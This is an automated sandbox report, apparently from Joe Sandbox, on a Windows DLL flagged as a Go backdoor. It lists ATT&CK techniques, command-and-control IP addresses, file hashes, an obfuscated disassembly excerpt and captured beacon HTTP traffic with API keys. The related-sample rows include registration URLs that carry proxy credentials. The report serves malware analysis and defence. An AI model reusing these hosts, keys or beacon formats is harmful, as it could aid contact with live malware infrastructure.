        Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
        Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
        Defense Evasion: 1 Masquerading; 11 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Rundll32; 1 DLL Side-Loading
        Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
        Discovery: 111 Security Software Discovery; 1 Process Discovery; 11 Virtualization/Sandbox Evasion; 111 System Information Discovery; Internet Connection Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
        Collection: 1 Credential API Hooking; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
        Command and Control: 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; 1 Proxy; Fallback Channels
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
        Behavior Graph (rendered as an image; only its text labels survived extraction)
        Behavior Graph ID: 1490750 | Sample: SecuriteInfo.com.Win32.Malw... | Startdate: 09/08/2024 | Architecture: WINDOWS | Score: 88
        Root signatures: Multi AV Scanner detection for submitted file; Yara detected GO Backdoor; Connects to many ports of the same IP (likely port scanning); 2 other signatures
        loaddll32.exe started. Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Switches to a custom stack to bypass stack traces. Started: cmd.exe, rundll32.exe, rundll32.exe, 3 other processes.
        cmd.exe started rundll32.exe.
        rundll32.exe (started by loaddll32.exe) contacted: 91.142.74.28 (ports 49737, 49745, 49746; VTSL1-ASRU; Russian Federation); 195.2.70.38 (ports 49736, 49743, 49744; VDSINA-ASRU; Russian Federation); 94.103.90.9 (ports 26395, 49739; VDSINA-ASRU; Russian Federation). Signatures: System process connects to network (likely due to code injection or exploit); Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Found Tor onion address.
        rundll32.exe (started by cmd.exe) contacted: 77.238.224.56 (ports 49747, 49748, 49757; TELERU-ASRU; Russian Federation); 77.238.229.63 (ports 49749, 49750, 49759; TELERU-ASRU; Russian Federation); 77.238.250.123 (ports 49751, 49752, 49761; TELERU-ASRU; Russian Federation). Signatures: System process connects to network (likely due to code injection or exploit); Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Found Tor onion address.

        Source | Detection | Scanner | Label
        SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | 37% | ReversingLabs | Win32.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        http://77.238.224.56 | 0% | Avira URL Cloud | safe
        http://195.2.70.38/ | 0% | Avira URL Cloud | safe
        http://77.238.250.123/ | 0% | Avira URL Cloud | safe
        http://77.238.250.123http://195.2.70.38 | 0% | Avira URL Cloud | safe
        http://91.142.74.28/ | 0% | Avira URL Cloud | safe
        http://77.238.229.63 | 0% | Avira URL Cloud | safe
        http://77.238.250.123 | 0% | Avira URL Cloud | safe
        http://91.142.74.28 | 0% | Avira URL Cloud | safe
        http://77.238.229.63/ | 0% | Avira URL Cloud | safe
        http://77.238.224.56/ | 0% | Avira URL Cloud | safe
        http://195.2.70.38 | 0% | Avira URL Cloud | safe


        No contacted domains info
        Name | Malicious | Antivirus Detection | Reputation
        http://195.2.70.38/ | true | Avira URL Cloud: safe | unknown
        http://91.142.74.28/ | true | Avira URL Cloud: safe | unknown
        http://77.238.229.63/ | true | Avira URL Cloud: safe | unknown
        http://77.238.250.123/ | true | Avira URL Cloud: safe | unknown
        http://77.238.224.56/ | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://77.238.224.56 | rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://77.238.250.123http://195.2.70.38 | rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://77.238.229.63 | rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://77.238.250.123 | rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://91.142.74.28 | rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://195.2.70.38 | rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        IP | Domain | Country | ASN | ASN Name | Malicious
        91.142.74.28 | unknown | Russian Federation | 48720 | VTSL1-ASRU | true
        77.238.229.63 | unknown | Russian Federation | 42429 | TELERU-ASRU | true
        195.2.70.38 | unknown | Russian Federation | 48282 | VDSINA-ASRU | true
        77.238.250.123 | unknown | Russian Federation | 42429 | TELERU-ASRU | true
        94.103.90.9 | unknown | Russian Federation | 48282 | VDSINA-ASRU | true
        77.238.224.56 | unknown | Russian Federation | 42429 | TELERU-ASRU | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1490750
        Start date and time:2024-08-09 19:27:26 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 28s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        Detection:MAL
        Classification:mal88.troj.evad.winDLL@14/1@0/6
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .dll
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes were analyzed, report is missing behavior information
        • VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        No simulations
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        91.142.74.28 | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 91.142.74.28:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
        91.142.74.28 | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | file.dll | malicious | Unknown | 91.142.74.28/
        91.142.74.28 | PZjMIa3MvC.exe | malicious | GO Backdoor | 91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
        77.238.229.63 | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 77.238.229.63:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
        77.238.229.63 | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | file.dll | malicious | Unknown | 77.238.229.63/
        77.238.229.63 | PZjMIa3MvC.exe | malicious | GO Backdoor | 77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
        No context
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        TELERU-ASRU | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 77.238.224.56
        TELERU-ASRU | QTmGYKK6SL.exe | malicious | Unknown | 77.238.224.125
        TELERU-ASRU | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        TELERU-ASRU | file.dll | malicious | Unknown | 77.238.224.56
        VTSL1-ASRU | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 91.142.74.28
        VTSL1-ASRU | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 91.142.74.28
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.74.28
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.73.198
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.74.28
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.74.28
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.74.28
        VTSL1-ASRU | file.dll | malicious | Unknown | 91.142.74.28
        VTSL1-ASRU | PZjMIa3MvC.exe | malicious | GO Backdoor | 91.142.73.198
        VDSINA-ASRU | SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe | malicious | GO Backdoor | 195.2.70.38
        VDSINA-ASRU | mips.elf | malicious | Unknown | 94.103.91.233
        VDSINA-ASRU | Notepad3_v6.23.203.2.exe | malicious | Amadey, GO Backdoor | 195.2.70.38
        VDSINA-ASRU | BFDFC7BDB3890683E8D3B5F3D9CAE5048DE3CBEDEBF223E4B9B732B096917BEB.exe | malicious | Bdaejec, Panda Stealer, Phoenix Stealer | 95.142.46.35
        VDSINA-ASRU | kz7iLmqRuq.exe | malicious | Quasar | 195.2.76.207
        VDSINA-ASRU | GN03tfEgsB.exe | malicious | DCRat, PureLog Stealer, zgRAT | 178.208.86.27
        VDSINA-ASRU | file.dll | malicious | Unknown | 62.113.116.83
        VDSINA-ASRU | file.dll | malicious | Unknown | 195.2.70.38
        VDSINA-ASRU | file.dll | malicious | Unknown | 195.2.70.38
        No context
        No context
        Process:C:\Windows\SysWOW64\rundll32.exe
        File Type:data
        Category:dropped
        Size (bytes):408
        Entropy (8bit):6.258258296408273
        Encrypted:false
        SSDEEP:6:LyMGXUN9cIkx3EnVMaP4/lR5+PBZu6jUkl3Lfll/FnaakdFgRDxa4Q:LyW2hy+aQ/f5+nDginaPoIJ
        MD5:05C73EE3A3D6540D8703EC6609C3989B
        SHA1:7C893E974E3B02DB59255DD1A37C352C6C0E47B8
        SHA-256:6F81160426E38E892426333BE9F683242FB4C0EC3BA1C84FA5CA2F623646DA77
        SHA-512:CD8902F3D642E6E1BBD2F4B286F80611EFA3638E7D55651F76ABD379E5F45CCAD98597BF8D354FE336850339CFC59B32F6E6C3EB668546606308BCBED2B657B2
        Malicious:false
        Reputation:low
        Preview:..!P.W.Y......=!S.V A).RL\(VX6"#WW8"V5..GV..\>.PM.95^_+.^.Z.M...ZT$(V7P^OX._.&"*...=.^....!(T.+.L'].F>,.W*..R*..G)-._...W.V.[.(.@.Z*T.:.]2;.@U_^Q7=5Q.T.BU.*.>.W.5.\....."..SRT.A,""L.V?^ .VY/%.M-.3[)5:]%.3[..>G.06\^..Q._?]1&8@<].V#[._./(B2 ..].P.....2#+..[+S.Z!A" QL.=5^ .7Y.Q.M7YS[S4.].3S[*<>G?..\.:.QW.QP..[@...U.(SZ)PYB.-......W)+..9,.._3S=3.A_..L?#.^=/&Y(].M8;.[7"$].<.[V./G.9%\.3.V...Y4[.@1..R. ![34.]4^7
        File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Entropy (8bit):7.902846676225024
        TrID:
        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
        • Generic Win/DOS Executable (2004/3) 0.20%
        • DOS Executable Generic (2002/1) 0.20%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
        File size:15'196'072 bytes
        MD5:ff432e4003e9d7135a97bd4dc0445dc3
        SHA1:41530cb367ca6b69378179b4bba91deaf7d3a342
        SHA256:03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
        SHA512:adfa35738774d096bcbe5891ed51bdd813d797f828a0c90748a5f6cb82b7a8a5a82656843d2387ed906bbaee6dec24b4a3f5ec910a614c728002a9d798480f27
        SSDEEP:393216:fRdW64cosTowwMzcG5FU90WGqNyW8O9hHZUSStMbZlna4:T6gozccuLoNyW8evUSs2
        TLSH:7DE633DA3ECF00E6E68119F4DB1717D717F3955A89C688382ACD3945A0A0FB7106F8E6
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...$........N...,l.........................p............@... .........................a..
        Icon Hash:7ae282899bbab082
        Entrypoint:0x6db924fd
        Entrypoint Section:TUaYW
        Digitally signed:true
        Imagebase:0x6c2c0000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
        TLS Callbacks:0x6db7a85d, 0x6c7abd60, 0x6c7abd10
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:1
        File Version Major:6
        File Version Minor:1
        Subsystem Version Major:6
        Subsystem Version Minor:1
        Import Hash:6c871eb5afcc648e749d578ab8277277
        Signature Valid:false
        Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
        Signature Validation Error:The digital signature of the object did not verify
        Error Number:-2146869232
        Not Before | Not After
        • 26/10/2021 17:14:19 | 26/10/2024 17:14:19
        Subject Chain
        • E=support@electronic.us, CN="Electronic Team, Inc.", O="Electronic Team, Inc.", STREET=901 N Pitt St Ste 101, L=Alexandria, S=Virginia, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Virginia, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=08345597, OID.2.5.4.15=Private Organization
        Version:3
        Thumbprint MD5:CC3D074101D5D8042D1F46EBFE30DEB6
        Thumbprint SHA-1:E98084272092F2202AF66578B6080FD1FFF73E6A
        Thumbprint SHA-256:9598F039F33B2F8F962F76838DE0B6CCDAA1D6DBA0034498FB1CA5DBCCC23F7E
        Serial:3BF56A3A410BD027F7F4CDCB
        Instruction
        push ebx
        push C71FF0ACh
        pushfd
        mov ebx, dword ptr [esp+04h]
        add bl, byte ptr [esp+ebx+38E00F59h]
        mov byte ptr [esp+ebx*2+71C01ECCh], FFFFFF80h
        seto bl
        shr ebx, 22h
        cmove ebx, dword ptr [esp+04h]
        mov ebx, dword ptr [esp+08h]
        mov dword ptr [esp+08h], 9664119Fh
        push dword ptr [esp+00h]
        popfd
        lea esp, dword ptr [esp+08h]
        call 00007FC2C809363Bh
        dec esi
        mov dword ptr [ebx+esi-01EE6FE8h], edx
        inc ecx
        bt ebp, FFFFFF9Fh
        inc cx
        rol edi, FFFFFFEFh
        inc esp
        xchg dh, ah
        dec esp
        lea edi, dword ptr [esp+ebx-01EE6F7Ch]
        dec ecx
        mov esi, dword ptr [edi+ebx*2-03DCDFB8h]
        dec eax
        bts edx, ecx
        dec eax
        xadd edx, ebx
        push ebp
        dec esp
        mov esp, esi
        jng 00007FC2C882FC1Ch
        call 00007FC2C7ED4A69h
        inc ecx
        mov ebp, BB944C2Ah
        dec ebp
        mov ebp, dword ptr [esi]
        inc ecx
        mov edx, 86AD04ACh
        dec ebp
        mov edi, dword ptr [esi+08h]
        inc ebp
        movzx ecx, dl
        dec edx
        lea ebp, dword ptr [C5B6758Dh+ecx*8]
        inc ecx
        inc cl
        dec ebp
        add ebp, edi
        mov ebx, C08F0A18h
        dec ebp
        mov edx, ebp
        inc eax
        movzx edx, ch
        movsx eax, dx
        inc ebx
        mov esi, dword ptr [esi+ecx*8-00000558h]
        and bl, 00000028h
        inc ebx
        mov dword ptr [edx+ecx*2-0000015Ah], esi
        dec edi
        mov ecx, dword ptr [eax+eax+00000000h]
        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xf61bfc | 0x61 | TUaYW
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1188d54 | 0x3c | TUaYW
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0xe78200 | 0x5da8f | f^Ycc
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1db6000 | 0x4f0 | SZVZY
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x1a86be4 | 0x18 | TUaYW
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0xf3d000 | 0x10 | cUfXW
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        becb` | 0x1000 | 0x4ec4a8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        [e[fe | 0x4ee000 | 0x2cf6c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        ^^STU | 0x51b000 | 0x2ae2d4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        bY^eU | 0x7ca000 | 0x36090 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        a_SfU | 0x801000 | 0x61 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        Y\d^_ | 0x802000 | 0x9c0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        T]^[_ | 0x803000 | 0x2c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        eZ]e\ | 0x804000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        f^Ycc | 0x805000 | 0x737ca7 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        cUfXW | 0xf3d000 | 0x2c | 0x200 | b7d30e9ed02236d72d9c14b9fe372f23 | False | 0.044921875 | data | 0.15517757530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        TUaYW | 0xf3e000 | 0xe77480 | 0xe77600 | 6a543533a21a260f56802b83396d908a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        SZVZY | 0x1db6000 | 0x4f0 | 0x600 | 73dc1c0d98e44233a766a4be4bfd4864 | False | 0.4524739583333333 | data | 3.9980226791839693 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        DLL | Import
        KERNEL32.dll | AddVectoredExceptionHandler
        msvcrt.dll | __mb_cur_max
        Name | Ordinal | Address
        MainFunc | 1 | 0x6c7a6460
        _cgo_dummy_export | 2 | 0x6cabf64c


        Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
        2024-08-09T19:28:49.448134+0200 | TCP | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 49739 | 26395 | 192.168.2.4 | 94.103.90.9
        2024-08-09T19:28:49.429828+0200 | TCP | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 26395 | 49739 | 94.103.90.9 | 192.168.2.4
        2024-08-09T19:29:19.090843+0200 | TCP | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 26395 | 49739 | 94.103.90.9 | 192.168.2.4
        2024-08-09T19:29:18.867934+0200 | TCP | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 49739 | 26395 | 192.168.2.4 | 94.103.90.9
        • Total Packets: 139
        • 26395 undefined
        • 80 (HTTP)
        • 195.2.70.38
        • 91.142.74.28
        • 77.238.224.56
        • 77.238.229.63
        • 77.238.250.123
        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        0 | 192.168.2.4 | 49736 | 195.2.70.38 | 80 | 7132 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:28:46.922494888 CEST | 293 | OUT | POST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 4bxNKbGL
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:28:47.557013988 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:28:47 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests
        Aug 9, 2024 19:28:47.770724058 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:28:47 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        1 | 192.168.2.4 | 49737 | 91.142.74.28 | 80 | 7132 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:28:47.706377029 CEST | 294 | OUT | POST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: mIeSOwbQ
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:28:48.350313902 CEST | 544 | IN | HTTP/1.1 200 OK
        Date: Fri, 09 Aug 2024 17:28:48 GMT
        Content-Length: 426
        Content-Type: text/plain; charset=utf-8
